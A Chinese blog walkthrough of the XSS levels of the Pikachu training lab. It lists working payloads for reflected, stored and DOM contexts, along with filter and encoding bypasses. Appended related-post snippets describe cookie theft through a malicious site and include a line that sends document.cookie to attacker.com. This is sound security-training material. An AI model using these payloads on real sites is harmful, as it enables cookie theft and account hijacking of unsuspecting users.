pikachu靶场XSS学习

最新推荐文章于 2025-10-30 10:53:33 发布
原创 最新推荐文章于 2025-10-30 10:53:33 发布 · 2.2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文介绍了反射型XSS(GET/POST)的突破方法,包括长度限制绕过、hackbar工具利用,以及存储型、DOM型XSS的payload构造与规避过滤。作者通过实例演示了如何在各种场景下利用XSS技术,并探讨了如htmlspecialchars、href与js输出的绕过策略。

文章目录

前言

文章同步于我的个人博客https://quan9i.top/pikachu,欢迎大家访问
感觉XSS挺有趣的,抽空刷一下XSS的小题

反射型XSS(get)

本来想着应该是没有什么限制的,但是输入的时候却发现貌似限制了长度,检查前端js代码
在这里插入图片描述
直接把20给它改成100
在这里插入图片描述
此时可以输入了,注入payload如下

<script>alert(document.cookie)</script>

在这里插入图片描述

方法二

虽然限制了长度,但我们还可以借助hackbar这种工具,对其进行注入
在这里插入图片描述

反射型XSS(post)

尝试简单sql注入登录后台,不过没弄出来,我这个菜鸡太菜了,此时我想的是扫描后端文件,看看能不能直接进入
在这里插入图片描述
用御剑扫描到了文件,但登录这个界面会因为没有登录而立即跳回登录界面,想想也是,这么简单就能绕过的话还登录干啥,无奈之下查看提示后进行登录,然后传入如下payload即可得到cookie

<body onload=alert(document.cookie)>

在这里插入图片描述

存储型XSS

发现没有什么过滤的,直接就是怒火焚身,啊呸,玩游戏玩多了,是获取cookie,构造payload

<img src=1 onerror=alert(document.cookie)>

在这里插入图片描述

DOM型XSS

本关先随便输入一下
在这里插入图片描述
发现这个东西他回显的不正常,猜想可能存在过滤啥的,看源代码
在这里插入图片描述

他还给出了提示,我们分析一下关键代码

 function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }

在获取到id为text的值后赋值给变量str,str被拼接到了a标签中,我们知道a标签中href是个插入链接的,我们想执行我们的语句的话就必须要让这个href跟我们的语句无关,那想让他无关的话我们这时候就想到了将a标签闭合,此时那个href里还有个'需要给它闭合上,因此我们构造语句前加上'>即可,可能有师傅会问双引号为啥不用闭,这里双引号就作为href的值了,因此不用闭就行,我们构造payload如下

'> <img src=1 onerror=alert(document.cookie)>

在这里插入图片描述
当然,提示给的那种方法也是可以的,payload如下

'> <img src=1 onmouseover=alert(document.cookie)>

这种的话需要你鼠标点到那个图片那里就可以出现我们插入的了,原因是onmouseover事件是将鼠标指针移动到图像上时执行 JavaScript

DOM型XSS -X

输入后回显仍然不对,看源代码
在这里插入图片描述
这个自定义函数输出了一段话,就是这个就让往事都随风,都随风吧,因此一但有这句话出现,就说明自定义函数执行了,然后其实他的闭合方式是和上关一样的,不过上关引用的时候没有添加语句,是直接引用的,这关多了一个语句,它有个onclick属性,指向了我们自定义的函数,因此我们在输入我们的语句后,就已经存储到了domxss那个自定义函数里,但是我们需要把他调出来用,这个时候就需要借用onclick,好吧,其实说人话就是点一下那个先出来的超链接就可以了,构造payload同上

'><img src=1 onerror=alert(document.cookie)>

在这里插入图片描述

xss盲打

注入一些xss后没啥反应
在这里插入图片描述

暂时没啥思路,遇事不决先扫一下
在这里插入图片描述
发现有个管理员登录文件,进去看看
在这里插入图片描述
盲猜密码是123456,登录进去瞅瞅
在这里插入图片描述
给了个弹窗,这不就是我注入进去的吗
在这里插入图片描述
可以发现注入进去了,只不过不在界面上显示而已

xss之过滤

这关过滤了一些东西啊
在这里插入图片描述
这个我输入那么多,就出来一个>,我前面的<script没了,说明肯定过滤了<script无法直接使用的话,我们可以尝试大小写给它绕一下子,构造payload如下

<Script>alert(document.cookie)</Script>

执行结果
在这里插入图片描述
尝试用双写绕过,构造payload如下

<sc<scriptript>alert(1)</sc<scriptript>

不过结果不尽人意,还是被过滤了,说明这里用了正则表达式,应该是<(.*)s(.*)c(.*)这种方式,无论如何插入都会被过滤

方法二

其实除了scipt标签,还有很多可以使用,这里列举两个

<body onload=alert(document.cookie)>
<img src=1 onerror=alert(document.cookie)>

在这里插入图片描述

XSS之htmlspecialchars

首先我们需要了解一下这个函数

PHP htmlspecialchars() 函数

定义和用法
htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号)成为 &amp;
" (双引号)成为 &quot;
' (单引号)成为 '
< (小于)成为 &lt;
> (大于)成为 &gt;
提示:要把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数。

语法
htmlspecialchars(string,flags,character-set,double_encode)

参数	描述
string	必需。规定要转换的字符串。
flags	可选。规定如何处理引号、无效的编码以及使用哪种文档类型。
可用的引号类型:

ENT_COMPAT - 默认。仅编码双引号。
ENT_QUOTES - 编码双引号和单引号。
ENT_NOQUOTES - 不编码任何引号。
无效的编码:

ENT_IGNORE - 忽略无效的编码,而不是让函数返回一个空的字符串。应尽量避免,因为这可能对安全性有影响。
ENT_SUBSTITUTE - 把无效的编码替代成一个指定的带有 Unicode 替代字符 U+FFFD(UTF-8)或者 &#FFFD; 的字符,而不是返回一个空的字符串。
ENT_DISALLOWED - 把指定文档类型中的无效代码点替代成 Unicode 替代字符 U+FFFD(UTF-8)或者 &#FFFD;

实例
把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体:
<?php
$str = "This is some <b>bold</b> text.";
echo htmlspecialchars($str);
?>
上面代码输出如下
This is some <b>bold</b> text.
其实就是把本来应该有特殊含义的标签给你转成实体了

这里猜测的话,他是默认那种情况,编码了双引号,现在的语句是<a href="插入">插入</a>这种形式,都会转为超链接那种形式,那我们给他添加一个点击标签,然后植入我们的恶意语句即可,看这个href我们href里还是空的,我们不需要他跳转到某个界面,因此我们直接输入#就可以,此时没有闭合,我们无法插入onclik属性,我们需要一个',这时闭合了,然后我们引入我们的onclick=alert(document.cookie),但是呢,我们的href标签本身他是有两个"的,还有一个在最后面,这个也需要闭合,因此我们在alert前面插入'即可,构造最终payload如下

#' οnclick='alert(document.cookie)

在这里插入图片描述
如果有师傅想问这种思路怎么来的,那就是测试,你本地输入12,对代码进行检查,就会看出他的格式是<a href="插入">插入</a>
在这里插入图片描述

XSS之href输出

沿用上关payload进行尝试,发现不行,查看js代码
在这里插入图片描述
发现单引号没用了,这里学习过后得知在a标签的href属性里面,可以使用javascript协议来执行js,因此我们构造payload如下

 javascript:alert(document.cookie)

在这里插入图片描述

XSS之js输出

我们先随便输入,然后查看源代码
在这里插入图片描述
123214是我输入的内容,他这里的话你怎么输入都是没法绕过的,else执行那里alert后面还有东西,这里也是无法进行弹窗的,那我们直接将其闭合,自己构造语句来进行即可,构造payload如下

</script><script>alert(document.cookie)</script>

在这里插入图片描述

Pikachu第二弹:XSS
Pisces_mango的博客
08-14 2093
一、反射xss(get) 1.输入语句,发现有长度限制,按F12,修改源码字符长度 2.输入语句 3.出现弹窗 二、反射xsspost) 1.输入账号密码登录 2.登录XSS后台,然后搭建恶意站点 这里是以POST的方式提交的,参数内容不会出现在URL中,这时候我们不能直接把我们的恶意代码嵌入到URL中,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实
PikachuXSS
weixin_48621644的博客
10-14 3382
小羊学安全 任重而道远~
pikachu靶场xss注入漏洞与分析测试,零基础入门到精通,收藏这篇就够了
leah126的博客
10-30 872
*工具实战:**集中训练抓包工具(Wireshark)、渗透测试工具(Nmap)、漏洞扫描工具(Nessus 基础版)的使用,结合模拟场景练习工具应用(掌握基础扫描逻辑,为 SRC 漏扫工具进阶做准备)。实战技能训练:开展漏洞扫描、漏洞利用、电商系统渗透测试、内网渗透、权限提升(Windows、Linux)、代码审计等实战训练,结合运维中熟悉的系统环境设计测试场景(强化红蓝对抗攻击端技术能力)。红蓝对抗基础:学习护网行动背景、红蓝对抗规则(攻击范围、禁止行为)、红蓝双方角色职责(红队:模拟攻击;
pikachu-XSS(跨站脚本攻击)
a1245678899的博客
11-09 1317
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOMXSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射和存储比起来,它是不经过后台交互的。存储XSS和反射XSS形成的原因是一样的,不同的是存储XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
Pikachu靶场:反射XSS(post)
witwitwiter的博客
04-07 5420
Pikachu靶场:反射XSS(post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●反射 交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 跨站脚本漏洞测试流程 1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回
pikachu靶场第六关——XSS(跨站脚本)之反射xss(post)(附代码审计)
03-18 757
这个是登录框的代码,需要登陆成功后,才有xss,用户名:admin,密码:123456。和上一关是一样,甚至这一个还没有长度限制,只是get变成了post而已。代码的话,只是加了个cookie,和xss漏洞关系不是很大,就不讲了。
pikachu靶场xss练习浏览器不执行js解决
qq_51627054的博客
12-06 670
1.今天在皮卡丘靶场练习反射xss(get),发现浏览器一直不会解析js代码。
Pikachu靶场XSS漏洞详解
Nai_zui_jiang的博客
08-22 1415
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览页面时,攻击者插入在页面的Script代码会被解析执行,从而达到恶意攻击的目。
pikachu靶场-XSS
braty_的博客
02-21 1844
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS漏洞:pikachu靶场中的XSS通关
qq_68163788的博客
05-25 2540
pikachu靶场中的XSS通关是一种漏洞攻击技术,通过在输入框中注入恶意脚本代码来实现攻击。攻击者可以利用XSS漏洞窃取用户的cookie信息、重定向用户到恶意网站或者篡改网页内容等。在pikachu靶场中,攻击者可以通过输入恶意代码实现跨站脚本攻击,从而获取敏感信息或者控制网页行为。要防范XSS漏洞,网站开发者应该对用户输入进行严格过滤和验证,避免恶意代码的注入。
pikachu靶场xss通关教程)
记录学习
05-11 3013
pikachu靶场通关之xss
pikachu--xss
鲨鱼辣椒的博客
05-12 5295
XSS概述 XSS全称跨站脚本(Cross Site Scripting)是web中最为常见的漏洞之一,也是危害特别大的一种漏洞,一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行(类似于SQL注入),从而产生危害。xss漏洞危害的对象主要是前端用户,并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS(窃取cookie)攻击流程 .
Pikachu靶场-反射xss(get/post)
2401_83964264的博客
06-01 230
我们先登录,用户名/密码为admin/123456,登录后在输入框中以同样的方式输入js代码,submit后会显示一个弹窗,观察url,发现我们的url中没有显示出我们构造的js代码,所以当我们再次访问这个网址的时候不会像get那样再次显示弹窗。其实这里还有一点关于cookie的内容,但是我一直获得不了cookie的数据,我的xss后台已经配置好了,可能是我还没有弄清楚post.html和cookie.php的地址到底该使用哪一个吧,解决后,继续更新。
pikachu靶场练习之XSS(反射XSS
qq_45795768的博客
10-01 1339
getxss的思路是找到存在漏洞的站点,设置一个含有恶意js的payload(比如获取cookie),制作成一个url,将这个url发送给需要攻击的对象,一旦对象点击,就会触发这个payload。postxss的思路是伪造一个自动提交的页面,html文件里包含了payload,我们只需要吸引被攻击者访问这个页面,就能实现我们的的攻击。
pikachu漏洞靶机之xss漏洞post提交方式
weixin_44110913的博客
03-05 712
我们要使用户提交post表单,我们需要让用户去访问一个页面,这个页面的作用就是使用户提交post表单,页面内容如下: 这段代码的意思就是,当用户访问页面的时候会自动以post的方式提交漏洞页面的cookie,提交的值就是value,在这里我们给value一段代码,代码的作用就是窃取cookie。 form表单中的action属性的意思是我们需要把数据(value)提交给action所值的页面。我们...
pikachu反射XSS(POST)
Lhy1963245411的博客
12-08 228
首先是登录界面,右上角提示了我们账号和密码,先进行登录。
皮卡丘(pikachu) XSS三种类举例
weixin_44787832的博客
07-22 3679
反射xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GETXSS漏洞,一般可将含XSS的URL伪.
pikachu靶场通关笔记06 XSS关卡02-反射POST
mooyuan的网络安全博客
05-28 1399
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到XSS风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS关卡02-反射POST的渗透部分。
Pikachu(皮卡丘靶场)初识XSS(常见标签事件及payload总结)
Welcome To My6n Blog
11-14 2815
XSS又叫跨站脚本攻击,是HTML代码注入,通过对网页注入浏览器可执行代码,从而实现攻击。​。domxss 的函数从具有 id 为 "text" 的元素中获取输入值,然后将其作为链接的 href 属性值插入到具有 id 为 "dom" 的元素的 innerHTML 中。尝试它给的payload:'>通过在链接的 href 属性中闭合单引号,然后插入一个图片元素,该元素的 onmouseover 事件触发一个弹窗,显
pikachu靶场xss原理
最新发布
11-15
<think> 嗯...用户想了解Pikachu靶场XSS攻击的核心原理,这需要结合跨站脚本漏洞的本质来解释。用户提供的四个引用都很有价值,特别是引用[2]明确指出XSS是前端漏洞,引用[1][3][4]则展示了具体攻击场景。 注意到引用[2]的关键描述:XSS形成是因为程序对输入输出处理不当,导致恶意代码被浏览器执行。这其实就是最核心的原理。用户可能希望更形象的理解,需要把抽象原理和Pikachu实例结合说明。 从技术深度看,用户能提出"原理"这个关键词,应该有一定Web安全基础,但可能对XSS的具体实现机制还不清晰。需要区分三种XSS:反射(如引用[3]的<script>闭合案例)、存储(如引用[1]的获取cookie)、DOM(引用[4]的onclick案例),但首次解释原理时不宜太细分。 特别要注意引用[3][4]展示的技术细节:攻击者需要精心构造payload来突破现有HTML结构,比如用'>闭合标签或构造新事件属性。这个"突破结构"的过程就是原理的核心实践。 用户情绪应该是认真求知状态,回复要兼顾严谨性和可读性。最后生成的三个问题覆盖了原理深化(Q1)、防御实践(Q2)和漏洞关联(Q3),形成完整学习路径。 </think> Pikachu靶场中的XSS攻击原理本质上是**利用Web应用对用户输入的不当处理,诱使浏览器执行恶意脚本**。其核心过程如下: ### 核心原理 1. **恶意脚本注入** 攻击者在Web应用的可输入点(如搜索框、留言板)提交包含恶意JavaScript代码的输入。系统未充分过滤或转义这些输入,例如: ```javascript <script>alert('XSS');</script> ``` 或利用事件属性(如引用[4]示例): ```html ' onclick="alert(111)"> <!-- 闭合原有标签并插入新事件 --> ``` 2. **恶意代码存储/反射** - **存储XSS**:恶意脚本被保存到服务器(如数据库),其他用户访问时自动执行(引用[2])。 - **反射XSS**:脚本通过URL参数传递,服务端直接返回含恶意代码的页面(引用[1][3])。 - **DOMXSS**:前端JavaScript不当操作DOM,直接执行攻击代码(引用[2][4])。 3. **浏览器执行** 当用户访问包含恶意代码的页面时,浏览器将其视为合法脚本执行。例如: - 窃取Cookie(引用[1]):`<script>document.location='http://attacker.com/?cookie='+document.cookie</script>` - 钓鱼攻击:伪造登录表单诱导用户输入凭证(引用[1])。 ### 漏洞根源(引用[2]) 1. **输入未过滤** 未对用户输入的`<`, `>`, `"`, `'` 等特殊字符进行过滤或编码。 2. **输出未转义** 服务端或前端将用户输入直接嵌入HTML/JavaScript上下文,未转义危险字符: ```php // 错误示例:直接输出未转义的用户输入 echo "<div>" . $_GET['input'] . "</div>"; ``` 正确做法应使用`htmlspecialchars()`等函数转义(引用[1][2])。 ### Pikachu靶场案例 1. **DOMXSS(引用[3][4])** 攻击闭合前标签并插入新事件: ```javascript ' onclick="alert(111)" > // 闭合<a>标签的href属性 ``` 最终生成: ```html <a href='#' onclick="alert(111)">what do you see?</a> ``` 2. **绕过过滤(引用[3])** 当`<script>`被过滤时,改用`<img>`标签触发: ```html <img src=x onerror=alert(1)> // 利用加载失败事件 ``` ### 防御措施(引用[1][2]) | 措施 | 实现方式 | |---------------------|----------------------------------| | **输入过滤** | 移除或编码`< > " '`等危险字符 | | **输出转义** | 根据上下文使用HTML/JS转义函数 | | **内容安全策略** | 设置CSP头限制脚本来源 | | **HttpOnly Cookie** | 防止JavaScript窃取敏感Cookie | > 总结:XSS本质是**"数据被误解析为代码"**。Pikachu靶场通过模拟未过滤/未转义的用户输入场景,揭示攻击者如何利用此漏洞控制用户浏览器[^1][^2][^3][^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值